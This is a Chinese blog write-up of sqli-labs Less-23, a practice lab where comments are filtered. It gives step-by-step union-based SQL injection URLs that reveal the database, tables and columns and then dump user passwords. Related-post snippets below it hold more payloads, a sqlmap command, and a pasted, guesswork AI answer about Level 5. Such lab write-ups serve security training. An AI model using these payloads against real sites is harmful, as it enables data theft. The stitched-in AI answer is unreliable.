SQL-labs的第23关——注释被屏蔽 union联合查询攻击(Get)

已于 2023-08-03 13:44:28 修改
阅读量304 收藏 2
点赞数 1
文章标签: sql 数据库 web安全
于 2023-08-03 13:41:06 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/qq_73393033/article/details/132081659
版权

1、判断闭合方式

输入语句

?id=1'

,返回页面如下:

我们猜测闭合方式是'。我们接下来输入语句

?id=1' --+

,返回页面如下:

我们有添加了),但是仍然报错,这时我们怀疑注释符被屏蔽了。

我们输入语句

?id=1' and '1'='1

,返回页面如下:

说明闭合方式是',并且注释符被屏蔽了。

2、判断回显位

我们发现这里好像有回显,我们输入语句

id=1' union select null,null,null,null and '1'='1

,返回页面如下:

但是如果是3个null,那么不会报错,这说明总共有3个注入位置。

接下来,我们看一下,那个位置可以进行回显。输入语句

?id=-1' union select 1,2,3 and '1'='1

,返回页面如下:

这说明只有第一个和第二个位置是回显位,我们只需要在这两个位置进行注入就行。其实只有第二个是回显位,第一个也不是。

3、爆破数据库名、用户名、版本、操作系统、数据库地址

输入语句

?id=-1' union select 3,concat(@@datadir,'~',@@version_compile_os,'~',database(),'~',user(),'~',version()),3 and '1'='1

,返回页面如下:

4、爆破数据表名

输入语句

?id=-1' union select 3,group_concat(table_name),3 from information_schema.tables where table_schema=database() and '1'='1

,返回页面如下:

5、爆破列名

输入语句

?id=-1' union select 3,group_concat(column_name),3 from information_schema.columns where table_name='users' and table_schema=database() and '1'='1

,返回页面如下:

6、爆破字段内容

输入语句

?id=-1' union select 1,(select group_concat(concat(id,'-',username,'-',password)) from users),2 and '1'='1

,返回页面如下:

到此打靶结束

使用报错注入也可以。

SQL-lab-23~28
qq_52921637的博客
03-22 233
less23 由题目可以知道,本是过滤注释GET型注入: 注入的语句是:id=-1’ union select 1,2,3 ='1 less24 本是——二次注入 知道用户名是:admin,但是不知道密码首先点击New User click here? 注册admin’ – -用户然后登录该用户修改密码 会显示,密码修改成功:然后再使用admin输入刚才admin’ – -修改的密码最后,登录成功,此时两个账号的密码一样 less25 本卡,过滤or和and的单引号注入 注入语句是:id=-1’ u
Sql-labs 靶场搭建及通
ming20211016的博客
11-07 3374
该语句的意思是查询information_schema数据库下的tables表里面且table_schema字段内容是security的所有table_name的内容。该语句的意思是查询information_schema数据库下的columns表里面且table_users字段内容是users的所有column_name的内。mysql_real_escape_string函数,宽字节注⼊,符号绕过,联合注⼊。没⽤禁⽤or,and,但过滤了select和union,可以⽤⼤⼩写和重写进⾏绕过。
sqli-labs(23)
mmzkyl的博客
01-29 312
卡是使用 ’ 进行闭合,但是在注释的使用上做了一些限制 先测试下面这两个payload: http://192.168.2.60/sqli-labs/Less-23?id=1'# http://192.168.2.60/sqli-labs/Less-23?id=1'--+ 若是不对输入进行过滤,上面两个payload均是能够返回正常页面,但是测试后发现上述两个payload均无法返回正常页面 # 与 --均被过滤,本题最大的难题便是无法通过注释注释掉多余的单引号,总而无法完成注入,使用上面两个pay
sqli-labs23
qq_53030229的博客
05-30 191
文章目录一、审查源码 一、审查源码 这里我就捡重要的代码挑出来说一下 preg_replace 函数执行一个正则表达式的搜索和替换,将reg $reg = "/#/"; $reg1 = "/--/"; $replace = ""; $id = preg_replace($reg, $replace, $id); $id = preg_replace($reg1, $replace, $id); $sql="SELECT * FROM users WHERE id='$id' LIMIT 0,1";
Sqlilabs-23
KAKA的博客
07-14 599
23 对注入字符做了正则表达式的过滤,所以需要在引号上下功夫: http://sqlilabs/Less-23/?id=1' and '1 知道了原理构造起来就很简单了: –查表 http://sqlilabs/Less-23/?id=-1' union select 1,(select group_concat(table_name) from informatIon_schema.tables where table_schema=database()),3 and '1' = '1 简化: .
sqli-labs/Less-23
m0_71299382的博客
11-19 196
sqli-labs第二十三
sqli-labs注入——sqli-labs的1-65指南
qq_51366383的博客
01-27 1956
sqli-labs图片上一共有75,但是下载的资料都只有65,所以只写了65,本文仅是个人想法,如有不对请多谅解。 前面三部分的数据为:security 1、Emails Id ,email_id 2、referers 3、Uagents id,uagent,ip_address,username 4、Users id,username,password password:Dumb,I-kill-you,p@ssword,crappy,stupidity,genious,mob!le,admin,
Sqli-labs靶场第11详解[Sqli-labs-less-11]
m0_73615178的博客
02-24 1842
SQL注入的三个条件:①参数可控;(从参数输入就知道参数可控)②参数过滤不彻底导致恶意代码被执行;(需要在测试过程中判断)③参数带入数据库执行。(从网页功能能大致分析出是否与数据库进行交互)利用 order by 来测列数测显位:mysql用1,2,3,4Mysql获取相数据:一、数据库版本-看是否认符合information_schema查询-version()二、数据库用户-看是否符合root型注入攻击-user()三、当前操作系统-看是否支持大小写或文件路径选择-
SQL注入——sqli-labs(Less-1)
E-Malon的博客
05-29 433
一边查看源码,一边多方学习别人的 WriteUp,在此过程中补充基础知识,最终落到实验操作。慢慢来,比较快。欢迎大咖指导,欢迎各位网友交流经验。
sqli-labs(23-37)
qq_43395215的博客
08-26 727
文章目录第23:第24:第25:第26:第27:第28:第29:第30:第31:第32:第33:第34:第35:第36:第37: 第2323感觉和第1一样,先用第一的操作试一试,先判断闭合方式 /Less-23/?id=1' and 1=2 --+ 判断所有的闭合方式都是无效,但是在报错信息里面,有于“’ LIMIT 0,1’的提示,按理说不应该出现才对,因为我们注入的sql语句后面有注释符,这一部分应该是被注释的,所以应该是注释被屏蔽了,所以我们采用另一种构造
(手工)【sqli-labs23联合查询+报错回显
07-11 451
SQL-联合查询+报错回显】
sqli-labs(二十三)
qq_65950075的博客
05-08 596
这一get类型当输入?id=1'时,出现报错信息,是由单引号闭合的但是输入?id=1'--+的时候,还是报错,说明我们的注释符可能被过滤处理了查看码源,确实是把注释符过滤了那我们还是根据语句构造?成功了判断字段数,这里不能用order by,只能不断往上加数字,不过一般都是3?说明是三个字段,只显示2号位,那我们就可以在这个位置进行注入?
sqli-labs-master第23
m_ing
05-17 1458
前言:从一开始我们是GET-----POST的路线来研究sql注入,这我们在从头早来研究GET请求方式。 http://192.168.89.139/sqli-labs-master/Less-23/ 我看到这个页面很是熟悉,提示我们输入id值作为参考。 我们加个’试一下 再来利用and来测试下,加入注释符#,编码成%23同样的报错 我们感到很好奇,还是看下原本代码 对注释符等都进行了过滤 突然一懵,我查阅了一些资料,只能采用单引号闭合的方法来绕过了,我们试试看! ?id 1=1’ and ‘1’=
Sqli-labs之Less-23
→_→
04-18 818
Less-23 基于错误的,过滤注释GET型 判断注入类型: ?id=1 ?id=1' ?id=1" 发现第二条语句报错: 翻译: 警告:mysql_fetch_array()期望参数1为资源,布尔值在第38行的C:\ phpStudy \ WWW \ sqli ...
sqli-labs--23-37指南(详细)
weixin_44576725的博客
11-14 1922
文章目录Less-23Less-24Less-25Less-25aLess-26Less-26aLess-27Less-27aLess-28Less-28aLess-29背景知识:正题:Less-30Less-31Less-32Less-33Less-34Less-35Less-36Less-37总结Less-37总结 前言:本节开始对advanced injections卡进行通记录,23-38 在这里补充一下信息收集的命令: @@version 数据库版本 @@datadir 数据库数据路径 @
sql-labs靶场第23-53新手通学习详解
m0_70483044的博客
11-10 1450
sql-labs 23-53新手教程~很早之前的文章忘记发了!!!有错误的地方欢迎指正!菜鸟选手。
sqli-labs Less-23sqli-labs指南 23)—Advanced injection
m0_54899775的博客
12-23 1346
sqli-labs Less-23sqli-labs指南 23
sqli-labs23注入字符做了正则表达式的过滤(二次注入)
qq_46527080的博客
12-25 309
第二十三 sqlmap方法 python sqlmap.py -u "http://127.0.0.1:8086/sqli/Less-23/?id=1" --prefix "'" --suffix ";%00" --technique U --dbs //就是简单加了个闭合和注释 一、源码分析 发现将#和–都进行了过滤替换,替换成了空格 咱们再来看看闭合点 闭合点是一个简单的单引号 这样就很简单了然后我们可以将注释换成单引号来进行注释 二、判断注入点 我用一个特殊的字符进行替换成注释符 ;%00==#和–
sqli.labs靶场(23到28a
喜欢创作各种技术类文章,希望可以帮到你
02-01 1468
爆数据:1' and 1=2 union select 1,2,group_concat(username,':',password) from users where '1'='1。爆库:31') unionunion select select 1,database(),3 and ('1')=('1。爆库POC:1')%26(substr(database(),1,1)='s')%26('1')=('1。爆库:1' and 1=2 union select 1,2,database()'
sql-labs第5
最新发布
04-03
<think>好的,我需要帮助用户找到SQL-Labs第5的解决方案。首先,我需要回顾用户提供的引用内容,看看是否有直接相的信息。用户提供的引用1到5主要涉及第46-50、29-31、第十一、第十七等,但没有明确提到第五。不过,可能有一些通用的技巧或方法可以应用。 首先,SQL-Labs卡通常涉及不同类型的SQL注入攻击,比如联合查询、报错注入、布尔盲注、时间盲注等。第5可能属于基础卡,可能涉及GET请求的单引号注入。根据常见的卡设计,第五可能类似于前几的结构,但可能有不同的闭合方式或过滤规则。 我需要参考用户提供的引用内容中的方法,例如引用1中的ORDER BY注入,引用2中的联合查询和group_concat的使用,引用3中的POST型注入,引用4中的HTTP参数污染和WAF绕过,引用5中的sqlmap使用。虽然这些引用不直接针对第五,但可能提供通用的解题思路。 接下来,我需要构建可能的步骤:确定注入点、判断闭合方式、确定列数、联合查询获取数据。可能涉及单引号闭合,使用联合查询注入,利用报错或布尔盲注。例如,用户可能在URL中使用?id=1'进行测试,观察是否有报错,然后使用--+注释后续内容。确定列数后,联合查询获取数据库信息,如数据库名、表名、字段内容。 同时,可能需要使用sqlmap工具自动化测试,如引用5中提到的使用-r参数读取请求文件,指定数据库和表进行爆破。此外,引用4提到的HTTP参数污染可能用于绕过某些过滤,但第五可能不需要这么复杂的技巧,因为它属于早期卡。 总结,虽然没有直接的第五信息,但根据常见方法和引用中的类似步骤,可以推断出解决方案。需要确保步骤清晰,包括闭合方式判断、列数确定、联合查询构造,以及使用工具的方法。同时,提醒用户注意实际测试中的变量,如过滤规则和闭合符号的变化。</think>### SQL-Labs第5解决方案分析 SQL-Labs第5通常属于**基于GET请求的单引号字符型注入**,需要通过联合查询Union Select)获取敏感信息。以下是详细步骤: --- #### **1. 判断注入点及闭合方式** - 输入`?id=1'`测试闭合符号: ```sql ?id=1' --+ ``` 若页面返回正常,说明闭合方式为**单引号**,且注释符`--+`成功闭合语句[^1][^4]。 --- #### **2. 确定字段数(列数)** 使用`ORDER BY`逐次测试列数: ```sql ?id=1' ORDER BY 3 --+ --页面正常 ?id=1' ORDER BY 4 --+ --页面错误 ``` 说明当前表有**3列**[^2]。 --- #### **3. 联合查询注入** 构造联合查询语句,探测回显位: ```sql ?id=-1' UNION SELECT 1,2,3 --+ ``` 若页面显示`2`或`3`,表示第2、3列为回显位[^4]。 --- #### **4. 获取数据库信息** 通过回显位提取数据库名、表名、字段数据: - **当前数据库名**: ```sql ?id=-1' UNION SELECT 1,database(),3 --+ ``` 输出示例:`security`。 - **爆表名**: ```sql ?id=-1' UNION SELECT 1,group_concat(table_name),3 FROM information_schema.tables WHERE table_schema=database() --+ ``` 输出示例:`users,emails`[^5]。 - **爆字段名**: ```sql ?id=-1' UNION SELECT 1,group_concat(column_name),3 FROM information_schema.columns WHERE table_name='users' --+ ``` 输出示例:`id,username,password`[^2][^5]。 --- #### **5. 提取用户数据** 获取`users`表中的账户密码: ```sql ?id=-1' UNION SELECT 1,group_concat(username,0x3a,password),3 FROM users --+ ``` 输出示例:`admin:5f4dcc3b5aa765d61d8327deb882cf99`(即`admin:password`的MD5值)[^5]。 --- #### **6. 使用SQLMap自动化注入** 若手动注入困难,可通过SQLMap自动化操作: 1. 保存请求为`1.txt`(包含GET请求的URL和参数)。 2. 执行命令爆破数据: ```bash sqlmap -r 1.txt --dbs # 爆破数据库 sqlmap -r 1.txt -D security -T users --dump # 提取用户表数据 ``` 参考引用[5]中的参数格式。 --- ###
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

Hacker-小胖锅

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值